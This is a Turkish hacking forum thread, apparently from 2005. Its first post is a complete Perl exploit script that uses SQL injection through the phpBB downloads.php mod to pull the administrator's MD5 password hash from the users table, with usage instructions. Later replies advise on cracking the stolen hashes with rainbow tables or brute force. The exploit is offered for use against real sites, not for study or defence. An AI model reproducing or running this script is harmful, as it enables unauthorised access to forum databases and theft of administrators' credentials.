Php Admin Pass.Md5 [ Phpbb 1.13 Down.]

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CYB3R-SPY
    CYB3R-SPY's avatar
    Kayıt Tarihi: 28/Temmuz/2005
    Erkek

    #!/usr/bin/perl -w
    use IO::Socket;

    ## Example:
    ## C:\>phpbb.pl www.hack.com /phpBB2/ 2
    ## /phpBB2/ userid=2
    ## downloads.php mod in phpBB <= 2.0.13
    ## **********************************
    ## [~] Connecting...
    ## [+] Connected!
    ## [~] Sending Data...
    ## [~] Data Sent, Waiting for response...
    ## [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
    ##
    if (@ARGV < 3)
    {
    print "\n\n";
    print "|************************************************* ***************|\n";
    print " phpBB <=2.0.13 'downloads.php' Mod\n";
    print " Bug found by Axl And CereBrums\n";
    print " Coded by CereBrums // 2/4/2005\n";
    print " Usage: phpbb.pl <site> <folder> <user_id>\n";
    print " e.g.: phpbb.pl www.hack.com /phpBB2/ 2 \n";
    print " [~] <server> - site address\n";
    print " [~] <folder> - forum folder\n";
    print " [~] <user_id> - user id (2 default for phpBB admin)\n";
    print "|************************************************* ***************|\n";
    print "\n\n";
    exit(1);
    }

    $take = 0;
    $success = 0;
    $server = $ARGV[0];
    $folder = $ARGV[1];
    $user_id = $ARGV[2];
    print "\n downloads.php mod in phpBB <= 2.0.13\n";
    print " **********************************\n";
    print " [~] Connecting...\n";
    $socket = IO::Socket::INET->new(
    Proto => "tcp",
    PeerAddr => "$server",
    PeerPort => "80") || die "$socket error $!";

    print " [+] Connected\n";
    print " [~] Sending Data...\n";

    $path = "http://$server/";
    $path .= "/$folder/";
    $path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*";
    print $socket "GET $path HTTP/1.0\r\n\r\n";

    print " [~] Data Sent, Waiting for response...\n";

    while ($answer = <$socket>)
    {
    if ($take == 1) {
    $pass = substr($answer,51,32);
    print " [+] MD5 Hash for user with id=$user_id is: $pass\n";
    $success = 1;
    $take = 0;
    }
    $found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0");
    if ( $found > -1 ) {
    $take = 1;
    }
    }
    if ($success==0) {print " [-] Exploit failed\n";}

    ## EOF ##


    ===========================================================


     


    Çalışma mantığı:

    downlands.php den sql e sorgu göndererir..ve attacker admin pass.ı md5 olarak çeker.. scrip kodun admini id numarasını 2 baz alarak sızıyor..


    by CYB3R-SPY

     


    ]Bâtıl şeyleri tasvir etmek, safi zihinleri idlâl eder
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    bahoo_27
    bahoo_27's avatar
    Kayıt Tarihi: 28/Temmuz/2005
    Erkek
    tamam emeğine sağlık da bu md5 olayı bir ölüm ha elli sene bekle yine çözemiyor direkt şifreyi ereninde olacağını zanetmiyorum ama yine de emeğine sağlık ;)
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    HolyDemon
    HolyDemon's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    bide perl linki verseydin dai ya
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Seer
    Seer's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    Combine bir password 6yı 7yi gectimi bunu md5 kırıcılarla kıramazsın(mümkün fakat suaki donanımınızla ayları yılları alır)
    8 Haneli Password u kırmakta ayları yılları alır
    Pek fazla umut baglamayın
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ir2
    ir2's avatar
    Bilgi/Destek Madalyası Developer Madalyası
    Kayıt Tarihi: 10/Mayıs/2003
    Erkek
    1.13 için çok daha iyi exploitler var md5 işe yaramaz
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kor4y
    kor4y's avatar
    Kayıt Tarihi: 28/Temmuz/2005
    Erkek
    Evet mevcut teknolojiyle aylarımızı alır.
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    cumhuronat
    cumhuronat's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    8 haneli alphanumeric bi md5 hash rainbow table ile 2 dakkada kırılabilir
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    XhanDros
    XhanDros's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek

    Rainbow table olayı dışında şifrede ascii karakterler yoksa ve fazla uzun değilse biraz sabırla brute yöntemide işe yarayabilir.


    "><i>">sdad
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CYB3R-SPY
    CYB3R-SPY's avatar
    Kayıt Tarihi: 28/Temmuz/2005
    Erkek

    Arkadaşlar verdiğim yolu tam yaptıktan sonra md5 hash için Rainbow table kullanabilrsiniz..Zor olmyacağını düşünüyorum...


    ]Bâtıl şeyleri tasvir etmek, safi zihinleri idlâl eder
Toplam Hit: 2788 Toplam Mesaj: 9